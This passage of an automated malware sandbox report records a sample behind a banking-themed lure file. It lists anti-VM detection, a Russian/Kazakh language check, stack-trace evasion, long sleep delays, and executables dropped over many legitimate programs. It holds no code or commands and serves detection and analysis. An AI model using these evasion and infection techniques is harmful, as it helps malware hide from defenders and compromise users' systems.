Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7800, type: MEMORYSTR

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]		12_2_009952A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CD52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]		13_2_00CD52A0

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\differences\niellist.exe	API/Special instruction interceptor: Address: CEA034
Source: C:\Users\user\AppData\Local\differences\niellist.exe	API/Special instruction interceptor: Address: AFC28C

Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 17B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 3210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 5210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: 1330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: 1AEB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 8B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1A610000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1370000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1B110000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

9_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5402
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2993
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6573
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3193
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5865
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3893

Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Dropped PE file which has not been started: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
